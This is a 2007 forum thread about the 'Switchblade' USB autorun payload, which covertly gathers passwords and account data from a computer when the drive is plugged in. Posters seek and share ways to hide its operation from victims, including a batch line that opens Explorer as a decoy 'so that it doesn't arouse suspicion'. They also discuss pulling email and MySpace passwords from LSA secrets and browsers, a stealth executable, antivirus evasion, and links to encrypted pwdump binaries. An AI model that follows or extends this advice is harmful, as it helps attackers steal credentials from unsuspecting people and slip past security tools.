Ahriman Posted May 10, 2007
I have been running Siliv's version of Switchblade, and it is sweeeeet! Just one question, though (there's always one): After the drive has been inserted, and the user has clicked the "Open.." in autorun, switchblade does its thing. I can see a problem right away in that it doesn't open an explorer window, so were I to pass this to someone at, say a LAN, they would straight away know that something is screwy. I have tried adding this to just before the :END call: start explorer.exe .... but this seems to have no effect. Anyone else have any ideas how I could get it to open explorer when it's done its thing, so that it doesn't arouse suspicion? Cheers
GonZor Posted May 10, 2007
> I have been running Siliv's version of Switchblade, and it is sweeeeet! Just one question, though (there's always one): After the drive has been inserted, and the user has clicked the "Open.." in autorun, switchblade does its thing. I can see a problem right away in that it doesn't open an explorer window, so were I to pass this to someone at, say a LAN, they would straight away know that something is screwy. I have tried adding this to just before the :END call: start explorer.exe .... but this seems to have no effect. Anyone else have any ideas how I could get it to open explorer when it's done its thing, so that it doesn't arouse suspicion? Cheers

Have you tried adding it to the beginning of the file? From what I can tell this would be a much smarter approach because it will not delay (especially on slower machines)
Ahriman Posted May 10, 2007
> Have you tried adding it to the beginning of the file? From what I can tell this would be a much smarter approach because it will not delay (especially on slower machines)

Tried that just then, still nothing. Even changed the command to be start explorer or start explorer but while it works properly if I double-click the go.cmd file, running it via autoplay seems to ignore this. Even tried the suggestions put forward in this post, but nothing :S
Leapo Posted May 10, 2007
This should open the root of the drive (you'll need to make sure you have nircmd.exe in your X:WIPCMD folder): @echo off start .... nircmd.exe win max ititle "Removeable"
Obi-Wahn Posted May 10, 2007
Look at the code a 2nd time. You've forgotten a single point. It has to be: start explorer ..... The single point says, that from this path to 2 instances up. Alternatively, you can add this line (at the top or at the end) to define the drive. (Info: it only works if the file autorun.inf (which is changeable) exists in the drive.) for %%i in (D E F G H I J K L M N O P Q R S T U V W X Y Z) do if exist %%i:autorun.inf start %Windir%explorer.exe %%i: (untested with start, I set a var with this line)
Ahriman Posted May 10, 2007
> for %%i in (D E F G H I J K L M N O P Q R S T U V W X Y Z) do if exist %%i:autorun.inf start %Windir%explorer.exe %%i:

Awesome, that worked a treat, thanks heaps.
Leapo Posted May 10, 2007
> Look at the code a 2nd time. You've forgotten a single point. It has to be: start explorer ..... The single point says, that from this path to 2 instances up...

Don't know what to tell you, my original code appears to work just fine on every system I've tried it on...
Ahriman Posted May 10, 2007
It's possible that it's my system that's causing that method to not work, as I have only tried it on this one so far. Over the weekend, I'll be able to test it on some other machines, and see which method works on those.
Carlyl3 Posted May 11, 2007
hey guys, where can I download the latest Switchblade package? the WIKI is still down, and none of the links to the download files in the forum work. help! what's the latest version of the payload?
Ahriman Posted May 11, 2007
I got one from network0.org, found the link in one of the posts here. It was the first one I could find that was still available. Otherwise, I suppose googling "switchblade usb" or something might find a few more options.
marc Posted May 19, 2007
-deleted post. I posted too soon for help with the U3 version payload, without giving it a good shot myself. Apologies.
GonZor Posted June 9, 2007
I've finally put my payload onto the wiki. At the moment I have not included the Hacksaw but I will be doing this soon when I have time. The Development thread for my payload is here (yes setzer1411 did spell my name wrong). I have also made a small site for my payload; this is where the most recent up to date information will always be. I will try to cover all questions in the forums on the FAQ here as well: http://www.users.on.net/~simmo_89/switchblade/Index.html
setzer1411 Posted June 9, 2007
Lol I see no misspelled words, but keep up the good work.
Evolution Posted June 10, 2007
I've made my own payload {version?} of switchblade, is it worth putting it on the wiki? Features include:
-ftp
-rar file (encrypted)
-choices on which files to run
-easily customisable batch file
-pre compiled stealth exe
and some more random stuff
Download it here or go to the homepage
Hurtcake Posted June 26, 2007
Hi, today something weird happened to my hacksaw. All the files just disappeared. All the files from the cmd folder, all the documents, even the script at the virtual cdrom. Only the file "PKIIntro" remains on the cd. Most of the files aren't detected by an antivirus, so it couldn't have deleted them. All the files were even read only. How can this happen?
elmer Posted June 26, 2007
> Hi, today something weird happened to my hacksaw. All the files just disappeared. All the files from the cmd folder, all the documents, even the script at the virtual cdrom. Only the file "PKIIntro" remains on the cd. Most of the files aren't detected by an antivirus, so it couldn't have deleted them. All the files were even read only. How can this happen?

You might have "Hide protected operating system files" turned on. Click "Tools" in Explorer, then go to "Folder Options," then "View," and finally uncheck "Hide protected operating system files." Here's a screen capture for you:
Hurtcake Posted June 27, 2007
Thanks for the reply. I really don't know what I did, but all the files came back today.. :shock:
comfortablynumb1163 Posted July 18, 2007
I only read the first 20 or so pages of the thread but this wasn't covered... Using the MaxDamage iso on my u3 drive is there a way that I can stop the explorer window from popping up when I connect the drive? I'm not sure if this is supposed to happen or a problem that is unique to my setup.
Charlie123 Posted July 26, 2007
The script for getting all the account info for email Addy and pass is great! Is there one in order to get the myspace password also?? Just curious...
GonZor Posted July 27, 2007
> The script for getting all the account info for email Addy and pass is great! Is there one in order to get the myspace password also?? Just curious...

Depending on whether the user has saved the password this COULD be retrieved through either lsa secrets, IE password or Firefox password. As far as I know there is no special way that a myspace password is saved, maybe myspace IM saves it somewhere?? I don't know, I've never used it.
USBHacker Posted October 23, 2007
> I've made my own payload {version?} of switchblade, is it worth putting it on the wiki? Features include:
> -ftp
> -rar file (encrypted)
> -choices on which files to run
> -easily customisable batch file
> -pre compiled stealth exe
> and some more random stuff
> Download it here or go to the homepage

Nope. Stealth exe? Can I have the source code for that please?
beakmyn Posted November 18, 2007
So, I'm in process of re-writing the switchblade 'code' into vbs. It's based on GonZor's method so it uses the ###.dat files. This is so that I can output the data into HTML format (very similar to WinAudit html). Now here comes one question/decision. Since vbs is more powerful than a simple batch file I can either
A. wshell.exec ("net user") which will be very fast and give me a list of users
B. Use WMI or another technique and get vastly more data: AccountType, Caption, Description, Disabled, Domain, FullName, LocalAccount, Lockout, Name, PasswordChangeable, PasswordExpires, PasswordRequired, SID, SIDType, Status
After doing some testing it appears that as expected wshell.exec is almost instantaneous whereas WMI or another method takes 20 seconds. Which would you prefer? I suppose I could just code both and then the user could just put a 1 or 2 in the dat file and I'll run the appropriate one.
trustme Posted November 18, 2007
Just so you know, in the future the payload will be based on a .ini, instead of dat files. It would probably be best to code both to let the user pick, we can create a spot in the gui for the user to pick which method (similar to FGDump/PWDump).
HarshReality Posted December 5, 2007
> > I've made my own payload {version?} of switchblade, is it worth putting it on the wiki? Features include:
> > -ftp
> > -rar file (encrypted)
> > -choices on which files to run
> > -easily customisable batch file
> > -pre compiled stealth exe
> > and some more random stuff
> > Download it here or go to the homepage
>
> Nope. Stealth exe? Can I have the source code for that please?

Incidentally firepassword shows as a virus with NAV
sc0rpi0 Posted December 12, 2007
> Ok, so I'd like to know what executables are detectable as viruses. pwdump is... I plan to fix that right now. PM me on irc if you have a better idea. nick == Brainkill
> =====================
> pwdump and its dependencies can be encrypted. I'll post links below to the programs. Standard Disclaimers Apply!
> http://www.brainkill.net/hack/pwdump.exe
> http://www.brainkill.net/hack/pwservice.exe
> http://www.brainkill.net/hack/LsaExt.dll
> =======================

How in the world did you encrypt them? I know how to make executables undetectable...that is...until I run them